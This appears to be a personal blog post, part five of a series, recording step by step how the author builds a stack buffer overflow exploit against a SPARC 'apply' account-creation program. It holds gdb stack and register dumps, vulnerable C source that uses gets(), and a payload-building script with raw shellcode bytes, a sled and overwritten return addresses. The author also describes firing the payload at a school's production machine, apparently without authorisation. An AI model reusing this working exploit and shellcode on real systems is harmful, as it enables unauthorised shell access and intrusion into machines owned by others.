Hacking Apply – Pt. V
(gdb) 0x00012b2c in askyorn () (gdb) $ unknown mode: cooked $ stty cooked $ exit (gdb) i r g0 0x0 0 g1 0x6e 110 g2 0x0 0 g3 0x0 0 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x0 0 o0 0xffbef930 -4261584 o1 0xffbefd81 -4260479 o2 0x2919e 168350 o3 0x1 1 o4 0xff33c008 -13385720 o5 0x0 0 sp 0xffbef8c0 0xffbef8c0 o7 0x12a68 76392 l0 0x291a0 168352 l1 0x28d91 167313 l2 0xff000000 -16777216 l3 0xff0000 16711680 l4 0xff00 65280 l5 0x81000000 -2130706432 l6 0x7efefeff 2130640639 l7 0x81010100 -2130640640 i0 0x0 0 i1 0x29190 168336 i2 0xff343a54 -13354412 i3 0x0 0 i4 0xff33c008 -13385720 i5 0x0 0 fp 0xffbefd40 0xffbefd40 i7 0x11630 71216 y 0x0 0 ---Type <return> to continue, or q <return> to quit--- psr 0xfe401007 -29356025 wim 0x0 0 tbr 0x0 0 pc 0x12b2c 0x12b2c <askyorn+252> npc 0x11638 0x11638 <Acct+376> fsr 0x0 0 csr 0x0 0 (gdb) x/96x $sp 0xffbef8c0: 0x000291a0 0x00028d91 0xff000000 0x00ff0000 0xffbef8d0: 0x0000ff00 0x81000000 0x7efefeff 0x81010100 0xffbef8e0: 0x00000000 0x00029190 0xff343a54 0x00000000 0xffbef8f0: 0xff33c008 0x00000000 0xffbefd40 0x00011630 0xffbef900: 0x00000000 0xff342fb0 0x00013da8 0x00000000 0xffbef910: 0x000292d1 0x00000024 0x00013da4 0x80000000 0xffbef920: 0x00000000 0x0000006e 0x00000000 0x00000000 0xffbef930: 0x6e6e6e6e 0x6e6e6e6e 0x110bd89a 0x9012216e 0xffbef940: 0xd023a054 0x110bdcda 0xd023a058 0x110b5a40 0xffbef950: 0xd023a05c 0xc023a060 0x9003a054 0xd023a048 0xffbef960: 0x9003a05c 0xd023a04c 0xc023a050 0x9003a054 0xffbef970: 0x9203a048 0x941b400d 0x8210203b 0x91d02008 0xffbef980: 0x901b400d 0x82102001 0x91d02008 0x41414141 0xffbef990: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9a0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9b0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9c0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9d0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9e0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef9f0: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa00: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa10: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa20: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefa30: 0x41414141 0x41414141 0x41414141 0x41414141 (gdb) si 0x00011638 in Acct () (gdb) $ $ $ exit (gdb) x/96x $sp 0xffbefd40: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefd50: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefd60: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbefd70: 0x41414141 0x41414141 0xffbefe68 0xffbef930 0xffbefd80: 0x00000000 0x00013da8 0x00028d92 0x0002919e 0xffbefd90: 0x00000001 0xff33c008 0x00000000 0x00000000 0xffbefda0: 0x00000000 0x00000078 0x00000000 0xffbef9a9 0xffbefdb0: 0x00000001 0x00000001 0xff33f014 0xff320208 0xffbefdc0: 0xffbefdc8 0x0001135c 0xff33e5f0 0x00000000 0xffbefdd0: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefde0: 0x00000000 0xff3de7a8 0x00000001 0xffbefebc 0xffbefdf0: 0xffbefec4 0x0002a6e4 0x00000000 0x00000000 0xffbefe00: 0xffbefe58 0x00010fec 0x00000000 0x00027ccc 0xffbefe10: 0xffbefe78 0x00000000 0x00000000 0x00000000 0xffbefe20: 0x00000000 0x00000000 0x00000003 0x00000000 0xffbefe30: 0x00000000 0x00000000 0x00000000 0xffffffff 0xffbefe40: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefe50: 0xffbefe58 0x00010fac 0x00000001 0xffbefebc 0xffbefe60: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefe70: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefe80: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefe90: 0x00000000 0x00000000 0x00000000 0x00000001 0xffbefea0: 0xffbefebc 0x00000000 0x00000000 0x00000000 0xffbefeb0: 0x00000000 0x00000000 0x00000001 0xffbeff50 (gdb) x/10i $pc 0x11638 <Acct+376>: mov %o0, %g1 0x1163c <Acct+380>: cmp %g1, 0 0x11640 <Acct+384>: be 0x114f4 <Acct+52> 0x11644 <Acct+388>: nop 0x11648 <Acct+392>: call 0x1320c <quit> 0x1164c <Acct+396>: nop 0x11650 <Acct+400>: b 0x114f4 <Acct+52> 0x11654 <Acct+404>: nop 0x11658 <Acct+408>: sethi %hi(0x28c00), %g1 0x1165c <Acct+412>: or %g1, 0x190, %g1 ! 0x28d90 <ibuf> (gdb) i r g0 0x0 0 g1 0x6e 110 g2 0x0 0 g3 0x0 0 g4 0x0 0 g5 0x0 0 g6 0x0 0 g7 0x0 0 o0 0x0 0 o1 0x29190 168336 o2 0xff343a54 -13354412 o3 0x0 0 o4 0xff33c008 -13385720 o5 0x0 0 sp 0xffbefd40 0xffbefd40 o7 0x11630 71216 l0 0x41414141 1094795585 l1 0x41414141 1094795585 l2 0x41414141 1094795585 l3 0x41414141 1094795585 l4 0x41414141 1094795585 l5 0x41414141 1094795585 l6 0x41414141 1094795585 l7 0x41414141 1094795585 i0 0x41414141 1094795585 i1 0x41414141 1094795585 i2 0x41414141 1094795585 i3 0x41414141 1094795585 i4 0x41414141 1094795585 i5 0x41414141 1094795585 fp 0xffbefe68 0xffbefe68 i7 0xffbef930 -4261584 y 0x0 0 ---Type <return> to continue, or q <return> to quit--- psr 0xfe401003 -29356029 wim 0x0 0 tbr 0x0 0 pc 0x11638 0x11638 <Acct+376> npc 0x1163c 0x1163c <Acct+380> fsr 0x0 0 csr 0x0 0 (gdb)
crucial address: right after the gets() in Acct:
0x11518
The exploit wasn’t working. The segfault was caused by another thing. Reg mess.
(gdb) 0x11778 <Acct+696>: srl %g1, 3, %g1 0x1177c <Acct+700>: and %g1, 1, %g1 0x11780 <Acct+704>: cmp %g1, 0 0x11784 <Acct+708>: bne 0x117c0 <Acct+768> 0x11788 <Acct+712>: nop 0x1178c <Acct+716>: add %fp, -28, %o2 0x11790 <Acct+720>: ld [ %o2 ], %o5 0x11794 <Acct+724>: add %fp, -24, %o4 0x11798 <Acct+728>: ld [ %o4 ], %g1 0x1179c <Acct+732>: ldub [ %g1 ], %o3
Luckily, the only reg we need to restore to normal is %o3
0x11794 <Acct+724>: add %fp, -24, %o4 0x11798 <Acct+728>: ld [ %o4 ], %g1 0x1179c <Acct+732>: ldub [ %g1 ], %o3 0x117a0 <Acct+736>: inc %g1 0x117a4 <Acct+740>: st %g1, [ %o4 ] 0x117a8 <Acct+744>: mov %o5, %g1 0x117ac <Acct+748>: stb %o3, [ %g1 ]
must put a good value into %fp-24
(gdb) print/x $fp-24 $1 = 0xffbefdb0
we just need a stack offset in there : )
it’s a double indirect pointer
so we need to use 2 stack values
and we need to figure out the offset in the buffer where %fp-24 variable is…
I might not be able to work with this :(
The fact that I had to guarantee double indirection is near impossible… So I am going to look elsewhere.
Already found a great place too: Groups()
Groups() comes after Acct()
Acct(&data); Groups(&data); /* offer choices from SETUP file */ ... Groups(datap) struct info *datap; { int index, count=0; DBUG(HELLO,"** Groups()\n",NULL); blurb(Groups_inst1); gets(ibuf); show_params(); for (index = 0; index < NPSETS; index++) datap->groups[index] = FREE; for (;;) { printf(GROUPS_PROMPT1); printf(GROUPS_PROMPT2, npsets); /* gets discards newline and null-terminates string */ if ( (gets(ibuf)) == (char *)NULL ) { *(ibuf) = 'x'; /* gets returns (char *)NULL on error or EOF */ *(ibuf+1) = EOS; /* We'll treat EOF as a 'quit'. */ } else { if ( *ibuf == '\0' ) { /* Empty line - no command */ *(ibuf) = 'p'; /* By default we'll print the menu */ *(ibuf+1) = EOS; } } switch (*ibuf) { case 'c': for (index = 0; index < NPSETS; index++) datap->groups[index] = FREE; count=0; break; case 't': show_info(datap); break; case 'p': show_params(); break; case 'q': if (count > 0) return(SUCCESS); printf("You did not select any group or class.\n"); /* FALL THROUGH */ case 'x': /* Give applicant a chance to abandon the application */ if (askyorn("Do you want to just forget the whole thing")) { blurb(Groups_quit); quit(); /* NOTREACHED */ } .. ...
I can add a group..
hit ‘x’, buffer overflow, then ‘q’
set a break coming out of Groups()
disas Groups ... 0x0001233c <Groups+836>: ret 0x00012340 <Groups+840>: restore
THERE IS HOPE!!
(gdb) x/96x $sp 0xffbefc88: 0xff33fad9 0x00000000 0x00000006 0x00000000 0xffbefc98: 0x00000000 0x00000001 0x000291a0 0xff33c008 0xffbefca8: 0x00029190 0xff3439ec 0x00029190 0x000292d1 0xffbefcb8: 0x00000018 0x00015081 0xffbefce8 0xff3141fc 0xffbefcc8: 0xff343194 0x00000000 0xffbefd94 0x00000000 0xffbefcd8: 0x00000000 0x00000000 0x7efefeff 0x00000038 0xffbefce8: 0xff3439ec 0x00028d90 0xff000000 0x00ff0000 0xffbefcf8: 0x0000ff00 0x81000000 0x7efefeff 0x81010100 0xffbefd08: 0x00028d90 0x00029190 0x0002919e 0xff343a54 0xffbefd18: 0xff33c008 0x00000000 0xffbefd48 0x000120a4 0xffbefd28: 0x000291c0 0x00029720 0x00000001 0x00000006 0xffbefd38: 0xffbefd40 0x00011698 0xffbef9a8 0x00028d90 0xffbefd48: 0xffbef9a8 0x00028d90 0x00000000 0x00000000 0xffbefd58: 0x00000000 0x00000000 0x00000000 0x00000000 0xffbefd68: 0x00027ccc 0x00028d91 0x0002919e 0x00000001 0xffbefd78: 0xff33c008 0x00000003 0xffbefdc8 0x00011424 0xffbefd88: 0x00000007 0x00027ccc 0x00000006 0xff343a54 0xffbefd98: 0x00000000 0x00027cd8 0x00027cc0 0x00000031 0xffbefda8: 0xfffffff5 0x000284d5 0x00000004 0x00000003 0xffbefdb8: 0xff33f014 0xff320208 0xffbefdc8 0x0001135c 0xffbefdc8: 0xff33e5f0 0x00000000 0x00000000 0x00000000 0xffbefdd8: 0x00000000 0x00000000 0x00000000 0xff3de7a8 0xffbefde8: 0x00000001 0xffbefebc 0xffbefec4 0x0002a6e4 0xffbefdf8: 0x00000000 0x00000000 0xffbefe58 0x00010fec
looks for the 00000004 that is our target must write with 0x01
here is where our buffer began:
0xffbef938: 0x6e414141 0x41414141 0x41414141 0x41414141 0xffbef948: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef958: 0x41414141 0x41414141 0x41414141 0x41414141 0xffbef968: 0x41414141 0x41414141 0x41009
MONEY
right at the beginning of apply execution, there is a call to this function:
switch (action = Get_old_pw(&data)) {
in that function is a call to my favorite vulnerable function, askyorn()
Get_old_pw(datap) struct info *datap; { struct passwd *pw; int try; DBUG(HELLO,"** Get_old_pw()\n",NULL); if (askyorn("Do you already have an account with us")) { printf("Please enter your login name: "); gets(datap->login); /* * always setpwent() to rewind, since previous getpw*'s * leave the file pointer in an indeterminate state. */ setpwent(); if ( (pw=getpwnam(datap->login)) == NULL ) { printf("Account for %s not found in database.\n",datap->login); printf("Your account will have to be recreated.\n"); if (askyorn("Do you want to re-use that login name")) { printf("OK. Re-using %s in this application.\n",datap->login); return(RECREATE); } else return(CREATE); } else { /* verify user's identity */ for (try=0; try<NTRIES; try++, printf("\nNope. Try again.\n")) { if (EQUAL(pw->pw_passwd, crypt(getpass(PROMPT),pw->pw_passwd))) { strncpy(datap->pass,pw->pw_passwd,SBUF); strncpy(datap->name,pw->pw_gecos,SBUF); return(MODIFY); } } printf("No match in %d tries.", try); printf(" Your password must be reset.\n"); fatal("Please see the operator or System Administrator."); } } else return(CREATE); }
This is EXACTLY the kind of behavior I want — fill the buffer and return,return without doing anything! <3 At this point, I have successfully exploited a locally run GDB version of the program. What's next is to produce a NOP-SLED with slicing capabilities. Step one to doing this : Figure out the max size of the SLIDE earlier I had this:
1092 + ‘nnnn’ = 1096 # asmshell5_interactive.bin is 84 bytes perl -e ‘print “nnnnnnnn”;’ cat asmshell5_interactive.bin # 92 bytes so far # 1096 – 92 = 1004 perl -e ‘print “A”x1004′ printf “\xff\xbe\xfe\x68″ printf “\xff\xbe\xf9\x30″ # code will start at 0xffbef938 # return address goes here
turn it into this:
I would like to turn this into C :
1004 / 4 = 251 NOPs
"nnnnnnnn" 251 NOPS shellcode fp retaddr
but i just prefer using bash for hits
bazz@life[pts/2][~/latest] cat build_apply_sc2 # asmshell5_interactive.bin is 84 bytes perl -e 'print "nnnnnnnn";' cat asmshell5_interactive.bin # 92 bytes so far # 1096 - 92 = 1004 perl -e 'print "\x01"x1004' printf "\xff\xbe\xfe\x68" printf "\xff\xbe\xf9\x30" # code will start at 0xffbef938 # return address goes here bazz@life[pts/2][~/latest] ./build_apply_sc2 > /tmp/B bazz@life[pts/2][~/latest] od -t x1 -A d /tmp/B 0000000 6e 6e 6e 6e 6e 6e 6e 6e 11 0b d8 9a 90 12 21 6e 0000016 d0 23 a0 54 11 0b dc da d0 23 a0 58 11 0b 5a 40 0000032 d0 23 a0 5c c0 23 a0 60 90 03 a0 54 d0 23 a0 48 0000048 90 03 a0 5c d0 23 a0 4c c0 23 a0 50 90 03 a0 54 0000064 92 03 a0 48 94 1b 40 0d 82 10 20 3b 91 d0 20 08 0000080 90 1b 40 0d 82 10 20 01 91 d0 20 08 01 01 01 01 0000096 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 * 0001088 01 01 01 01 01 01 01 01 ff be fe 68 ff be f9 30 0001104 bazz@life[pts/2][~/latest] od2sc /tmp/B "\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x6e\x11\x0b\xd8\x9a\x90\x12\x21\x6e" "\xd0\x23\xa0\x54\x11\x0b\xdc\xda\xd0\x23\xa0\x58\x11\x0b\x5a\x40" "\xd0\x23\xa0\x5c\xc0\x23\xa0\x60\x90\x03\xa0\x54\xd0\x23\xa0\x48" "\x90\x03\xa0\x5c\xd0\x23\xa0\x4c\xc0\x23\xa0\x50\x90\x03\xa0\x54" "\x92\x03\xa0\x48\x94\x1b\x40\x0d\x82\x10\x20\x3b\x91\xd0\x20\x08" "\x90\x1b\x40\x0d\x82\x10\x20\x01\x91\xd0\x20\x08\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01\x01" "\x01\x01\x01\x01\x01\x01\x01\x01\xff\xbe\xfe\x68\xff\xbe\xf9\x30"
looking good. Let’s get it into C. The only offsets I’ll be changing are 1100,1101,1102,1103 for the return address. We need smart PTY “signal handling”. I use CTRL-V to print out a raw ctrl character to grab its hex code:
bazz@life[pts/2][~/latest] printf "^S" | od -t x1 0000000 13 0000001
CTRL-S will adjust the return address based on a slicing algorithm I’ve yet to create, and CTRL-D as always, sends the payload without a carriage return. CR is manually inserted with CTRL-J.
made sure I was doing things correctly:
#include <stdint.h> main() { uint32_t calc_RA = 0x12345678; //calculated return address char c; c = ( calc_RA >> 24 ) & 0xff; printf ("MSB = %2x\n", c); c = ( calc_RA >> 16 ) & 0xff; printf ("byte 3 = %2x\n", c); c = ( calc_RA >> 8 ) & 0xff; printf ("byte 2 = %2x\n", c); c = ( calc_RA ) & 0xff; printf ("LSB = %2x\n", c); }
its useful to know the ret address of Get_old_pw: 0x00011a58
NOP SLIDE RANGE IS FROM 0xffbef940 -> 0xffbefd2C
I am now at the point where I can get a shell on my own remote system demo,
I can get the shell invoking the application on a remote system at school,
but no on the actual production machine… I wonder….
Could they be using ASLR??? is the stack at a different location?? My best guess is that it’s running in 64-bit mode, which is unlikely…
7FFFC000-7FFFFFFF is the stack space, 16KB, 16384 bytes.
midd le is 7FFFE000
The shell code is the same for the 64-bit version…
Well I just tried all the 64-bit stack space.. that didnt work… I did skip one offset to hell with it.
Since I have no idea what to do, I’m just like -.- what else can I find on blade60?? HM i dunno let’s try this:
grep -r -i "blade60" / 2>/dev/null > anything_blade60_related #
TO BE CONTINUED
Leave a Reply